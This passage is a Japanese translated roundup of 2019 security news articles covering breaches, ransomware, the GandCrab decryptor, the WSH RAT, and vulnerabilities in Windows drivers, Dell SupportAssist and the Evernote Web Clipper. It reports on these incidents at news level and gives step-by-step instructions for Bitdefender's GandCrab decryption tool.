    Foxitデータ漏洩通知メール

     Foxitはデータ保護当局と法執行機関にこの漏洩を通知した。そして、当局の調査に協力する予定である。
     この企業は、今回のセキュリティインシデントを詳細な解析を主導し、この企業全体のセキュリティ体制を強化し、将来のセキュリティインシデントに対する適切な安全対策を実施するために、セキュリティ管理企業を雇用した。
     Foxitは、今回のデータ漏洩のリスクを低く見積もらず、警戒しておくように顧客に助言している。他のWebサイトやサービスで彼らのFoxit'My Account'認証を使用している顧客は、不正アクセスを防ぐためにパスワードを変更するように促されている。Foxitはまた、口座情報を確認し、個人情報の盗難を回避するために信用情報を監視するなど警戒を怠らないように助言している。更に、顧客は、詐欺師が詐欺(フィッシング)によって更に情報を収集するために彼らのデータを使用する可能性があることに注意する必要がある。
     Bleeping Computerは、このデータ漏洩によって影響を受けたユーザの数、違反の原因、発見された日付(ユーザデータが公開された期間を含む)に関する詳細をFoxitに問い合わせたが、この記事の公開時点で回答を得ていない。この記事は、Foxitからの回答があり次第アップデートされる。


    「協調型の身代金要求型マルウェア攻撃」が、テキサス州の23自治体を襲撃
    BleepingComputer : News>Security(2019/08/18)
     テキサス州は現在、州内の地方自治体を標的にした前例のない身代金要求型マルウェア攻撃に晒されている。この攻撃の影響を受ける自治体は少なくとも23にのぼる。
     テキサス州情報資源管理局(Department of Information Resources (DIR))が、この攻撃の対応と調査を主導しているため、現時点で詳細は殆ど分かっていない。テキサス州は、影響を受けている地方管轄区域が、緊急管理部(The Division of Emergency Management)に支援を要請するよう指導する簡単な通知をリリースした。

    23は最終的な数字ではない可能性

     この攻撃は、8月16日の朝に始まった。収集された証拠に基づくと、この攻撃は単一の攻撃者によって実行されているようである。
     確認された犠牲者の数は23であり、これは「実際に、あるいは、潜在的に影響を受けた」実数であると、この部署は考えている。
     この攻撃の源は、現在判明していないが、DIR、Texas Division of Emergency Management、Texas Military Departmentのような地元のテキサス州当局が調査中である。
     この調査には、Department of Homeland Security(国土安全保障省)、FBIサイバー部門、Federal Emergency Management Agency(連邦緊急事態管理局(FEMA))のような連邦政府機関も関与している。
     先週の金曜日にリリースされた最初のステートメントで、DIRは、攻撃の源の調査は進行中であるが、優先されることは、影響を受けた自治体への対応と復旧を支援することであると発言している。

     「現在、DIR(テキサス州情報資源管理局)とテキサスA&M大学システムのCyberresponse and Security Operations Centerチームは、最も重大な影響を受けている管理区域に要員等を配備している」

     DIRの追加として、テキサス緊急管理部(TDEM)が、州のオペレーションセンターを介して州の機関と連携して、その努力を支援すると通知しているので、影響を受けている自治体からの要求があれば追加の要員等が提供される。
     DIRは、"coordinated ransomware attack"(協調型身代金要求型マルウェア攻撃)と呼ばれる件に対する対応を主導しているが、どの組織が影響を受けているのかを公開していない。これはセキュリティ上の懸念からである。
     Elliot Sprehe(当該部署の報道官)は、DIRが影響を受けている自治体の総数を確認しようとしていると、KUT(テキサス大学オースティン校), Austin's NPR Station(【訳注】 NPRはNational Public Radioの略。アメリカ公共ラジオ局と訳される)に告げている。
     「これは、我々が本日これまでに発見したように見えるが、セキュリティ上の懸念から影響を受けた自治体を現在リリースしていない」と、Spreheは、このアメリカ公共ラジオ局に告げている。
     土曜日の更新情報で、DIRは、テキサス州のシステムとネットワークは、この攻撃によって影響を受けていないと発言している。
     詳細が明らかになるまで、この攻撃の張本人であるファイル暗号化マルウェアの株と加害者が要求している身代金額は不明なままである。
     望むべくは、適切なバックアップシステムが実装されており、現在の努力が安全なコピーからデータを復元し、通常に戻すための復元活動であることを。

    身代金要求型マルウェアは米国において強大である

     米国において最近、身代金要求型マルウェア事案は増大している。そして、政府の部門がしばしば標的になっている。そして、大変多くの行政機関が身代金の支払いに応じる時、身代金が50万ドル(約5億3000万円)以上なのは常識である。
     セキュリティ企業Malwarebytesの遠隔測定法によるデータは、世界中の他のどの国よりも米国が身代金要求型マルウェア攻撃の対象(世界中のこの事案の53%に及ぶ)になっていることを明らかにしている。
     6月、サイバー犯罪者は、フロリダでの2つの攻撃で、その時点で100万ドルを少し超える価値のBitcoinでの支払いを要求し勝ち取っている。
     他の州の組織(テネシー州コリアーヴィル、ニューヨーク州オノンダガ郡立図書館、ジョージア州ヘンリー郡、ルイジアナ州とアラバマ州学区)も最近、身代金要求型マルウェアによって攻撃されている。
     リンクの地図は、米国の医療、教育、政府組織に影響を与えたファイル暗号化事案を示している。
     これら全ての攻撃で共通することは、バックアップの復元手順であり、サイバー犯罪者に支払いをしないことある。


    Windows 10 1903ユーザが、KB4512508をインストールするとエラーが発生するとレポートしている
    BleepingComputer : News>Security(2019/08/15)
     膨大な数のユーザが、最新のWindows 10 1903(【訳注】 日本時間2019年5月22日に配信されたバージョン)用KB4512508累積アップデートをインストールすることができない、0x800f0982や0x800f081fのような様々なエラーコードでインストールに失敗すると報告している。

    Windows Update KB4512508

     このアップデートをインストールしている時、ユーザは、インストール100%のマークを得るが、次に、エラーコードが表示されると報告(, )している。
     この報告中に見られる最も一般的なエラーコードは、0x800f0982, 0x800f081f, 0x80073701, 0x800f0845, 0x8024200Dである。
     残念ながら、これらエラーコードが意味していることを理解しようとしても、Microsoftが限定的な情報しか提供していないので、いつもながら簡単なことではない。以下は、この件とは直接関連していないMicrosoftサポート記事に基づいた一部のエラーコードに関する出来る限りの説明である。

      ・ 0x800f0982 - このエラーコードは、「デバイスにアジア系言語パックがインストールされている」時に、今までのWindows 10のアップデートで表示される(,
      ・ 0x800f081f - このエラーは、インストレーションメディアが破損、使用不可能、あるいは、ユーザがそのファイルに対する適切なパーミッションを持っていない場合に発生する可能性がある。
      ・ 0x8024200D - このエラーは一般的に完全なインストールをするために複数のダウンロードステップを要求し、それらのステップの一つが失敗した時に表示される。 あなたは、アップデートが中断したところから、このアップデートを継続できるか否か確認するために再起動するか、もう一度やり直すこともできる。

     現時点で、Microsoftはこの問題を認識していない。ユーザに残されている道は、自分自身でこの問題を解決するか、公式の対応が与えられるまでアップデートのインストールを遅らせるかの何れかである。
     ユーザはまた、最新のServicing Stack Update(SSU: サービススタックの更新プログラム)KB4508433が、インストールされているか否かチェックしたいかもしれない。このSSUアップデートは、Windows Updateがインストールに失敗することを防ぐために既知のバグを解決するように設計されている。


    Windows 10セキュリティ警告: 40を超えるドライバ中に脆弱性が発見された
    BleepingComputer : News>Security(2019/08/10)
     正当なデバイスドライバのセキュリティを解析している研究者達は、少なくとも20のハードウェアベンダからの40を超えるドライバに、特権の昇格を達成するために悪用することのできる脆弱性が含まれていることを発見した。
     ハードウェアはソフトウェアが存在するコンピュータの構成要素を意味する。ドライバは、オペレーティングシステムがハードウェアコンポーネントを識別し、それらと相互作用することを可能にするものである。
     ドライバコードは、OSカーネルとハードウェア間のコミニケーションが可能になり、システムの通常ユーザや管理者よりも高いパーミッションレベルを享受できる。
     それ故、ドライバ中の脆弱性は、悪意ある行動主体がカーネルへのアクセスを獲得し、オペレーティングシステムのより高い権限を獲得することによって脆弱性攻撃をすることができるので緊急の問題である。
     ドライバはまた、ハードウェアファームウェアをアップデートするためにも使用されるが、ドライバはOSの範囲外であるより深いレベルで動作するコンポーネントに到達し、機能を変更したり、それらをブロックしたりすることさえできる。
     例えば、BIOSとUEFIファームウェアは、あなたがコンピュータを起動した時に、オペレーティングシステムの前に起動するローレベルソフトウェアである。このコンピュータに植え付けられたマルウェアは、殆どのセキュリティ ソリューションにとって不可視であり、OSを再インストールしても削除することはできない。

    ドライバは信頼されている

     ファームウェアとハードウェアのセキュリティ企業Eclypsiumの研究者達は、ユーザ空間からカーネルパーミッションに特権を昇格するために悪用される可能性のある40を超えるドライバを発見した。
     影響を受ける企業(リストは、この記事の末尾)は、全てのメジャーなBIOS企業と、ASUS, Toshiba, Intel, Gigabyte, Nvidia, Huaweiのようなコンピュータハードウェア業界のビッグネームを含んでいる。
     「これら全ての脆弱性は、プロセッサとチップセットI/O空間、モデル固有レジスタ(MSR)、制御レジスタ(CR)、デバッグレジスタ(DR)、物理メモリとカーネル仮想メモリへの読み込みと書き込みアクセスのような、ハードウェアリソースへの高い特権でのアクセスを実行するためのプロクシとして挙動することを可能にする。」(Eclypsiumより)  カーネルから、攻撃者はファームウェアとハードウェア インターフェースに移動し、OSレベルで動作する通常の脅威防御製品の検出能力を超えてターゲットホストをセキュリティ侵害することができる。


    ソース: Linagora Engineering

     Windowsにドライバをインストールするには、管理者権限が要求され、Microsoftによって認証された信頼される企業からである必要がある。このコードはまた、信頼性を証明するために正当な認証機関によって署名されたものでもある。署名が欠けていると、Windowsはユーザに警告を発生する。
     しかしながら、Eclypsiumの研究は、Windowsによって受け入れられた有効な署名の付いた正当なドライバに言及している。これらのドライバは、悪意があるように設計されてはいないが、悪意あるプログラムと行動主体によって悪用されることができる脆弱性を含んでいる。
     さらに悪いことに、これらのドライバは、Windows 10を含むWindowsの全ての最先端のバージョンに影響を与える。

     「この問題は、Microsoft Windowsの全ての最先端のバージョンに適用され、Windowsマシンを、これら既知の不良ドライバの一つをロードしないようにするための普遍的なメカニズムは現在存在していない。」

     この研究者達は、脆弱性のあるドライバの中に、グラフィックカード、ネットワークアダプタ、ハードドライブ、その他のデバイスと相互作用するドライバを発見したと発言している。

    リスクは仮説ではない

     これらのコンポーネントに植え付けられたマルウェアは、「格納されたり、表示されたデータを読み込み、書き込み、リダイレクトすることや、ネットワーク越しに送信することが可能である。」 更に、このコンポーネントは、システムでサービスの拒否状態(denial-of-service)を引き起こすために無効化することができる。
     脆弱性のあるドライバを悪用する攻撃は、理論上でしか存在しないものではない。これらは資金の豊富なハッカーによるサイバースパイ活動中で特定されている。
     Slingshot APTグループ(【訳注】 非常に高度なサイバースパイ活動グループ)は、感染したコンピュータ上で特権を昇格するために古い脆弱性のあるドライバを使用した。APT28(別名: Sednit, Fancy Bear, Strontium Sofacy)のLojaxルートキットは、署名されたドライバを介してUEFIファームウェア中に格納されたため、より狡猾なものであった。
     Windowsの全ての最先端のバージョンは、この問題の影響を受ける。そして、脆弱性のあるドライバのロードを防ぐためのより広範な規模でのメカニズムは存在していない。
     攻撃のシナリオは、既に脆弱性のあるドライバをインストールしているシステムに限定されるわけではない。脅威の行動主体は、特権の昇格と永続目的のために、それらを追加することができる。
     この脅威を軽減する解決策には、期限切れのシステムおよびコンポーネントファームウェアに関する定期的なスキャンと、脆弱性を解決するためにデバイスメーカーからの最新のドライバー修正プログラムを適用することが含まれる。
     以下は、影響を受ける企業のリストの一部である。他の企業の一部は、依然として記事差し止めの下にある。

    American Megatrends International (AMI)
    ASRock
    ASUSTeK Computer
    ATI Technologies (AMD)
    Biostar
    EVGA
    Getac
    GIGABYTE
    Huawei
    Insyde
    Intel
    Micro-Star International (MSI)
    NVIDIA
    Phoenix Technologies
    Realtek Semiconductor
    SuperMicro
    Toshiba


    韓国の100万を超えるペイメント・カードの詳細がダークWebで売られていた
    BleepingComputer : News>Security(2019/08/03)
     韓国から収集された盗まれたペイメントカード(【訳注】 クレジットカードやデビットカード等支払い機能のついたカードの総称)の詳細の数は、過去二ヶ月で急増し、100万を超える記録がダークWebで販売用に供されていた。

    韓国のカード記録の猛烈な増加

     6月、研究者達は、5月に確認されていた42,000から尋常でない増加をし、230,000レコードが売られていることに気づいた。そして、これは通常観測された量と一致していた。次の月には、レコード数は890,000以上にまで増加していた。
     このセキュリティ侵害の源は、現時点で未知のままであるが、このデータは、韓国における多くの事業者でのカード提示取引からのものである。
     これらのサービスは複数の販売業者の支払いデバイスと連動しているので、これは、point-of-sale(PoS、【訳注】 販売情報を即時に管理するシステム)統合装置が晒されたという理論を補強している。


    100万を超えるカード提示取引レコード(画像をクリックすると拡大します)

    需要は価格を粗2倍にしている

     韓国の支払い記録は、犯罪者達が利用できる多大な供給を持っていたため、昨年度の需要は低調であったと、サイバー犯罪フォーラムでカード関連行動を監視しているGemini Advisoryの研究者達は発言している。2019年、これは、供給は同じで、需要は増加に変化した。
     現在の状況はまた、カードの平均価格を上昇させた。昨年、韓国のカード提示取引の記録は、平均24$で売られていた。
     今年の需要の増加で現金化しようとした場合、一つの支払いカードの記録は、平均40$と大変高価になっていた。

    米国のカード所有者も影響を受けている

     この研究者達からの別の観測として、セキュリティ侵害された韓国の記録の3.7%は、アメリカで発行されたカードであった。

     「最も影響を受けている米国の金融機関の一つは、アメリカ空軍に奉仕している信用組合である。空軍は韓国に複数の空軍基地を維持している」と、Gemini Advisoryは発言している。

     セキュリティ侵害されたデータを注視してみると、カードの多くは韓国を訪問したことのある米国の所有者に属していることが明らかになった。


    セキュリティ侵害されたカードの国別TOP 5(注:日本も存在しています)

     カード提示取引から支払いデータの詳細を盗むことは、一般にPoSデバイスに接続しているシステム上にマルウェアを植え付けることで実行される。多くの重大事案において、攻撃ベクトルは、Defaultもしくは推測が容易なパスワードで保護されているリモートデスクトップ接続であった。
     この方法でインストールされたマルウェアは、顧客が購入するためにカードを使用している時に、支払いデータはRAMに格納されるので、支払いデータをコピーすることができる。これが可能なのは、カード情報がRAM中で暗号化されていないからである。


    WeTransferにセキュリティ上の重大事案: 別人にファイルを送信
    BleepingComputer : News>Security(2019/06/21)
     不愉快なセキュリティ上の重大事案、WeTransferファイル共有サービスは、2日に渡り、ユーザ共有ファイルを別人に送信していたとアナウンスした。このサービスは、プライベート、機密ファイルと考慮されているものを転送するために使用されるので、この問題は、影響を受けるユーザにとっては大変なプライバシー問題になる可能性がある。
     今日から、ユーザは、6月16,17日の両日、WeTransferサービスを使用して送信されたファイルは、送信者が意図していない人々にも配信されたと述べるWeTransferからのメール[1, 2, 3]を受け取り始めた。
     このe-Mailによると、このチームは何が発生しているか分からず、この状況を封じ込めるために作業していると発言している。


    WeTransferユーザに送信されたe-Mail(画像をクリックすると拡大します)

     このe-Mailの完全版は以下である。

    WeTransferユーザー諸氏
     セキュリティ上の問題に関して、WeTransferサービスのe-Mailが別人に送信されていたことをお知らせします。 これは6月16日と17日に発生しました。 我々のチームは、この状況を修正して封じ込め、それがどのように起こったのかを発見するために精力的に作業してきました。
     送信または受信した転送が一部の人にも配信されていることがわかりました。 我々の記録では、これらのファイルが、アクセスされたことが示されていますが、その殆どは意図されている受信者によってアクセスされています。 それにもかかわらず、予防措置として、これ以上のダウンロードを防ぐためにリンクをブロックしました。
     あなたのe-Mailアドレスは転送されたe-Mailにも含まれているので、あなたが受け取る疑わしい、もしくは、通常ではないe-Mailに注意してください。
    私達は、あなたのデータがいかに重要であるかを理解しています。当然のことですが、私たちのサービスに対するあなた方の信頼を決して無駄にしません。 質問や懸念がある場合は、このe-Mailに返信し、サポートチームに連絡してください。

    WeTransfer Team

     WebTransferは、彼らのWebサイトで、アカウントの一部はログアウトされ、パスワードはアカウントを保護するためにリセットされた。そして、この重大事案に巻き込まれたTransferリンクへのアクセスはブロックされているとするセキュリティ通知をポストしている。
     「この重大事案は、6月16,17日に発生した。発見されるやいなや、我々はユーザを保護するための予防的なセキュリティ対策を講じた」 続けて、「これは、ユーザが、彼らのアカウントをログアウトされ、彼らのアカウントを防御するためにパスワードのリセットが要求されることを意味している。更に、我々のユーザのTransferのセキュリティを確保するためにTransferリンクをブロックした」と、Wetransferはセキュリティ通知で述べている。
     これが単純なWebTransferのプログラミングのミスであるというのなら、彼らがユーザのパスワードをリセットしたり、ユーザを保護する必要性を感じていることは奇妙である。これは、彼らのネットワークが侵害されたような、もっと深刻な問題である。
     BleepingComputerは、この重大事案に関してWebTransferに接触したが、この記事を公開した時点で、回答を耳にしていない。


    同梱されているシステム健全性ソフトウェアのフローにより、数百万のDell PCに攻撃に対する脆弱性
    Bitdefender : Hot For Security(2019/06/22)
     Windowsを稼働している数百万のDell PCとラップトップに大変深刻なセキュリティホールを介して攻撃される脆弱性が存在している。この脆弱性は、悪意あるハッカーによって攻撃されるとデバイスをハイジャックされ制御される可能性がある。
     DellのWebサイト上で公開されたサポート アドバイザリによると、Dellは、この問題がサードパーティーのコンポーネントであるSupportAssist(DellのホームユーザとビジネスPCに同梱されているトラブルシューティング ソフトウェア)中にあると明らかにしている。このソフトウェアは、Dellが「業界初の自動化された予防的および予測的サポート技術」と説明しているソフトウェアである。
     その宣伝資料で、DellはSupportAssistが「あなたのシステムのハードウェアとソフトウェアの健全性を予防的にチェックする」と主張している。問題が検出されると、必須のシステム状態情報が、トラブルシューティングを開始するためにDellに送られる。Dellは、コストのかかる問題にならないように対話で解決するために、あなたに接触してくる。」
     しかしながら、セキュリティ研究者Peleg Hadarは、SupportAssistのPC Doctorコンポーネントに、DLLがハイジャックされる脆弱性が含まれていることを発見した。このDLLハイジャックの脆弱性は、攻撃の間に、システムレベル権限を取得される可能性がある
     このメカニズムを介して、ハッカーは簡単にターゲットのコンピュータの制御を獲得することができる。
     SupportAssistソフトウェアは数百万のDellのPCとラップトップにプレインストールされているので、オンライン犯罪者が、このフローを悪用しようとする多くの刺激が存在している。
     もっと悪いことに、Dellは、この脆弱性を含むこのソフトっウェアを実際には作成していない。このソフトウェアは、ネバダ州を本拠とする診断ソフトウェアのスペシャリストPC Doctorによって書かれている。PC Doctorは、彼らの技術を他のPCメーカーにライセンスし、そのメーカーのPCやラップトップに同梱してもらっている(リブランド、商標変更)。
     Hadarによると、他に影響を受ける製品には以下が含まれる。

    PC-Doctor Toolbox for Windows
    CORSAIR ONE Diagnostics
    CORSAIR Diagnostics
    Staples EasyTech Diagnostics
    Tobii I-Series Diagnostic Tool
    Tobii Dynavox Diagnostic Tool

     この問題の大きさは、Dellの顧客以上に広がるだろう。PC Doctorは、そのWebサイトで以下のように述べている。「大手コンピュータメーカーは、世界中のコンピュータシステムに一億を超えるWindows用PC Doctorをプレインストールしている。」
     Hadarは4月29日にDellに対してこの脆弱性を通知している。彼は5月21日に、この問題を確認し詳細をPC Doctorに転送している。パッチは5月28日にDellによって発行された。これは、自動アップデートを受け取る設定にしている全てのDellコンピュータは、既にパッチされていることを意味している。
     彼らのコンピュータが脆弱性があるかもしれないと懸念しているDellユーザは、PCやラップトップにインストールされているSupportAssistのバージョンをチェックする必要がある。Business PC用のDell SupportAssistバージョン 2.0.1と、Home PC用のDell SupportAssistバージョン 3.2.2は、このセキュリティホールに対する脆弱性は存在しないと言われている。
     しかしながら、あなたのDellコンピュータが自動アップデートをONにしていないのであれば、あるいは、あなたが、この脆弱性のあるコードを実行している他のブランドのコンピュータを所有しているのであれば、まさに今、行動しアップデートを適用しなさい。


    GandCrab 5.2復号ツールのリリースは、邪悪な身代金要求型マルウェア物語を終わらせる
    BleepingComputer : News>Security(2019/06/17)
     世界中の法執行機関の協力のもとでBitdefenderは、GandCrab身代金要求型マルウェアのバージョン1,4, 5から5.2で暗号化されたファイルを復号する復号ツールのアップデート版をリリースした。
     Bitdefenderと欧州刑事警察機構のアナウンスによると、GandCrab身代金要求型マルウェア用の復号ツールは、この身代金要求型マルウェアの最新版を復号する。

     「このツールは、オーストリア (Bundeskriminalambt-BMI), ベルギー (Federal Computer Crime Unit), ブルガリア (Bulgarian Cybercrime Unit), フランス (Police Judiciaire de Paris-Befti), ドイツ (LKA Baden-Wurttemberg), オランダ (High Tech Crime Unit), ルーマニア (DIICOT), イギリス (NCA and Metropolitan Police), 米国 (FBI), 欧州刑事警察機構の法執行機関と民間のBitdefenderとの協働でリリースされた。」

    Bitdefenderによる今迄のGandCrab身代金要求型マルウェア用の復号ツールと類似して、このツールは暗号化アルゴリズム中の欠陥に起因して可能にするものではない。代わりに、法執行機関と協働したこのセキュリティ企業は、犠牲者のファイルを復号するために必要な復号キーをダウンロードするためにGandCrabのコマンド&コントロールサーバーへのアクセスを取得する。
     GandCrab復号ツールの使用方法に関する説明は、この記事の末尾にある。あなたが何らかの支援を必要としているのであれば、気兼ねせず、この記事、もしくは、我々のGandCrab Support and Helpフォーラムのトピックにコメントを残しなさい。

    GrandCrabの盛衰

     BleepingComputerは、GandCrabがExploit.inのようなハッカーフォーラムでアフィリエイトとしての身代金要求型マルウェア(Ransomware-as-an-Affiliate)システムを介して拡散し始めた2018年1月28日の最初のリリース以来、ずっとGrandCrabを追い続けてきた。
     最初のリリース時、GandCrab身代金要求型マルウェアは、RIG脆弱性攻撃キットを介して拡散し、犠牲者のファイルを暗号化し、それらファイルの名前に .GDBC 拡張子を追加していた。


    当初のGandCrab脅迫文(画像をクリックすると拡大します)

     GandCrabの開発者達は、身代金要求型マルウェアを監視している研究者や組織を愚弄する傾向を持っていた、そして、最初のリリースも違いはなかった。
     最初のリリース時、GandCrab開発者達は、彼らの実行ファイル内に、身代金要求型マルウェアを追跡しているBleepingComputerや他の組織に因んだ名前を彼らのコマンド&コントロールサーバの一つに名付けることで、愚弄するメッセージをBleepingComputerに送ってきた。
     これらのオリジナルコマンド&コントロールサーバは以下である。

    bleepingcomputer.bit
    nomoreransom.bit
    esetnod32.bit
    emsisoft.bit
    gandcrab.bit

     それ以来、我々は、彼らの最終リリースバージョン5.2まで、GandCrabチームがリリースする複数のバージョンを追跡してきた。


    GandCrab 5.2脅迫文(画像をクリックすると拡大します)

     GandCrabチームは、コマンド&コントロールサーバがハッキングされたり、研究者が復号ツール[1, 2, 3]をリリースしたりと幾つかの障害にぶつかったが、彼らが今月撤退をアナウンスした時、巨大な収益を上げたと主張している。
     ハッカーフォーラムExploit.inへの撤退投稿において、この身代金要求型マルウェア開発者達は、身代金の支払いで20億ドル(約2155億円)稼ぎ、個人あたりの収益は1億5000万ドル(約162億円)だと主張している。


    GandCrab撤退報告(画像をクリックすると拡大します)

     この復号プログラムのアップデート版のリリースで、GandCrab身代金要求型マルウェアの寿命は、公式に終焉し、ユーザは現在、無料で彼らのファイルを取り戻すことができる。

    GrandCrabで暗号化されたファイルを復号する方法

     GandCrab身代金要求型マルウェアの v1, v2, 5-5,2に感染しているのであれば、あなたは、Bitdefenderによってアップデートされた復号プログラムを使用して無料でファイルを取り戻すことができる。
     最初に、以下のダウンロードリンクからBDGandCrabDecryptTool.exeファイルをダウンロードする。

    BDGandCrabDecryptTool.exeファイルのダウンロード

     ダウンロードしたら、このプログラムをダブルクリックすると、使用許諾書が表示されるので、これを受け入れる。
     この復号プログラムが起動すると、マシンがインターネットに接続されている必要があるとする注意が表示される。これは、この復号プログラムが、あなたの復号キーをチェックし、それをダウンロードするためにBitdefenderのサーバに接続する必要があるためである。


    インターネット接続を必要とするメッセージ

     これで、メインのGandCrab復号プログラムの画面が表示される。この時点で、あなたはコンピュータ全体を復号するのか、それとも特定のフォルダを復号するのかのオプションを持つことになる。


    BitdefenderのGandCrab復号プログラム(画像をクリックすると拡大します)

     私は、このプログラムが間違いなく動作することを確認するために、最初にこの復号プログラムでファイルを復号テストするように提案する。きちんと動作したら、コンピュータ全体を復号するために"Scan entire system"を選択しなさい。
     あなたが望むオプションを選択したら、復号を開始するために、Start Toolボタンをクリックしなさい。
     復号プロセスが開始されると、この復号プログラムは、特定の情報を取得するために脅迫文を探す。この情報はBitdefenderのサーバにアップロードされる。キーが発見されると、この復号プログラムに送り返される。


    復号キーを取得中(画像をクリックすると拡大します)

     復号キーが取得されロードされると、この復号プログラムは、あなたのコンピュータ上のファイルの復号を開始する。あなたは、この復号プログラムのスクロールバーを使用して進捗状況を追跡することができる。


    GandCrabで暗号化されたファイルを復号中(画像をクリックすると拡大します)

     終了すると、この復号プログラムは、終了を宣言し、何らかの問題があることをあなたに警告する。
     問題がある場合には、ログファイルへのリンクをクリックすると、%Temp%\BDRansomDecryptor\BDRansomDecryptor\BitdefenderLog.txt ログファイルが自動的に開く。このファイルは、復号されたファイルと復号できなかったファイルの概要を含んでいる。


    終了した復号プログラム(画像をクリックすると拡大します)

     例えば、我々の例では、この復号プログラムは、10ファイルを除く全てのファイルを復号した。幸いなことに、これらのファイルは、アプリケーションを再インストールすることで再作成されたアプリケーション特定のファイルであった。
     この復号プログラムの動作に何らかのトラブルがあった場合には、此処、もしくは、我々のGandCrab Support and Helpフォーラムトピックの60ページに、気兼ねせずコメントを残しなさい。


    新しいWSH RATマルウェアは銀行の顧客をキーロガーで狙っている
    BleepingComputer : News>Security(2019/06/14)
     セキュリティ研究者は、リモートアクセス・トロイ(RAT)を拡散させ、市中銀行の顧客をキーロガーと情報探索型マルウェア(information stealer)で積極的に狙っているフィッシングキャンペーンが進行中であることを発見している。
     この新しいマルウェア(その作成者によってWSH Remote Access Tool (RAT)と名付けられている)は、2013年に最初に作成され拡散したVBS(Visual Basic Script)を基にしたHoudini Worm (H-Worm)の亜種である。
     そのうえ、JavaScriptに移植され、そのコマンド&コントロールサーバ(C2)サーバと通信する時、様々なユーザエージェント文字列と区切り文字を使用しているが、WSH RATは、基本的にH-Wormと同一である。

    「機能」が満載されたWHS RAT

     この新しいRATを発見した一つであるCofenseの研究チームは「WSHは、おそらくWindowsマシンでスクリプトを実行するために使用されるアプリケーションである正当なWindows Script Hostを参照している」と発言している。
     更に、WSH RATは、その開発チームによって大々的に売り出されており、6月2日にリリースされただけで、悪意あるURL、並びに、MHT、ZIPの形式でのフィッシングキャンペーンを介して積極的に拡散している。


    フィッシングe-Mailのサンプル

     このRATは、バイヤーが、彼らの標的のコンピュータを遠隔からコントロールする、ファイルをアップロード・ダウンロード・実行する、並びに、リモートスクリプトとコマンドを実行するために、犠牲者のWebブラウザやe-Mailクライアントからパスワードを盗む攻撃能力を発動することを可能にしている。
     このRATはまた、キーログする能力も特徴としている。これは、アンチマルウェア・ソリューションを殺し、Windows UACを無効にすることを可能にする。また、全ての侵害された犠牲者に対して一括してコマンドを発行するオプションも付いている。
     今まさに、その作成者はサブスクリプションベース・モデル(【訳註】提供する商品やサービスの数ではなく、利用期間に対して対価を支払う方式のことで、多くの場合「定額制」と同じ意味で用いられる。(IT用語辞典バイナリより))で販売中である。全ての機能は、一月50$支払う顧客のために開放されている。


    WSH RATサブスクリプション情報

    WHS RATフィッシングキャンペーン

     最初に説明したように、WHS RATの悪意あるe-Mail添付ファイル(URL、ZIP、MHTフォーマット)を配布するフィッシング攻撃は、RATペイロード(【訳註】悪意の総量の意味)を含むZIPaアーカイブをダウンロードさせるために市中銀行の顧客をリダイレクトすることによって積極的に彼らを狙っている。
     ターゲットが引き金を引くと、悪意あるペイロードが、H-Wormと同じ設定構造とコマンド&コントロールサーバ通信基盤を使用してターゲットのコンピュータにダウンロードされる。
    コマンド&コントロールサーバーに接触すると、WHS RATは、第二段階の部分として、更に三つの悪意あるペイロードをPE32実行ファイルの形式(camouflaged as .tar.gzアーカイブ)で犠牲者の侵害したマシン上にダウンロードし投下する。


    第二ステージの悪意あるペイロードのダウンロード(画像をクリックすると拡大します)

     三つの悪意あるツールは、キーロガー、メール認証情報ビューアー、ブラウザ認証情報ビューアーであり、何れも、サードパーティーによって開発され、認証情報と他の重要な情報を収集するために、このキャンペーンのオペレータが使用している。
     Cofenseの研究者達が発見したように、「Hwormの焼き直しは、脅威のオペレータが、今日のIT環境で未だ機能するテクニックを再使用する意思があることを証明している。」
     また、「MHTファイルを含む .ZIP を配布するフィッシングキャンペーンは、Symantec Messaging Gatewayのウィルスとスパムチェックをバイパスすることが可能であり」、成功裏にそのターゲットに感染していた。
     URL、IPアドレス、およびMD5マルウェアサンプルのハッシュを含む侵害の兆候(IOC)のリストは、CofenseのWSH RATレポートの末尾に提供されている。 


    Evernoteアドオンの緊急のフローは数百万の重要なデータを漏洩させる
    BleepingComputer : News>Security(2019/06/12)
     Evernote Web Clipper Chrome拡張中の緊急のフローは、潜在的に攻撃者がサードパーティのオンラインサービスからユーザの重要な情報にアクセスする可能性があった。
     「Evernoteの人気の高さに起因して、この問題は、この拡張を使用している利用者と企業(発見した時点で、約460万ユーザ)に影響を与える可能性があった」と、この財弱性を発見したセキュリティ企業Guardioは発言している。

    ユニバーサル・クロスサイトスクリプティング・フロー

     このセキュリティ問題は、CVE-2019-12592として追跡されるユニバーサル・クロスサイトスクリプティング(UXXS、別名 Universal XSS)であり、「Webブラウザの同一生成元ポリシーをバイパスし、攻撃者にEvernoteドメイン外からIframe中でのコード実行権限を承認する」Evernote Web Clipperのロジカル・コーディング・エラーから発生しているものである。
     Chromeのサイト分離セキュリティ機能が無効にされると、他のWebサイトのアカウントからのユーザデータは最早保護されず、悪意ある行動主体はサードバーティーのサイトから「認証、金融、ソーシャルメディアでの個人的な会話、個人のe-Mail等を含む」重要なユーザ情報にアクセスすることを可能にする。


    このフローへの攻撃

     これは、ターゲットを、標的にされているサードパーティのWebサイト付きの非表示のiframeをロードし、ロードする全てのiframeに悪意あるペイロード(「クッキー、証明書、個人情報を盗み、ユーザとしての行動を実行する」)を挿入することをEvernoteに強いるように設計された攻撃の引き金になるハッカーがコントロールしているWebサイトにリダイレクトすることによって実行される。
     Guardioは、脆弱性のあるEvernote Web Clipper Chrome拡張を使用して、あらゆる人のソーシャルメディア、財務情報、ショッピングデータ、プライベートなメッセージ、認証データ、e-Mailへのアクセスを取得する方法をデモするCVE-2019-12592フロー用の実用的な概念の照明(PoC)を設計している

    Evernote Web Clipper UXSS脆弱性は既に修正されている

     Evernoteは、5月27日のGuardioの責任ある公開報告を受けた週にこの脆弱性を完全にパッチし、5月31日全てのユーザに対してこの修正を公開した。6月4日、このパッチは完全に機能することが確認されている。EvernoteのWeb Clipper Chrome拡張のパッチされたバージョンを使用しているか否か確認するには、Evernote Chrome拡張のページ(chrome://extensions/?id=pioclpoplcdbaefihamjohnefbikjilc)に進み、バージョン7.11.1以降がインストールされていることをチェックしなさい。
     Guardio CTOのMichael Vainshteinは、「我々が発見した脆弱性は、ブラウザの拡張機能を細心の注意を払って精査することの重要性を証明するものである」と発言している
     更に、「必要なのは、あなたが実行したりオンラインに格納したりしているものを侵害するための危険な拡張一つだけである。波及効果は即時であり激しいものである。」
     2017年、Evernoteは、多大なユーザの反発から、彼らのスタッフがユーザの暗号化されていないメモを読むことを可能にしていたプライバシーポリシーに対して提案していた「改善」を撤回しなければならなかった
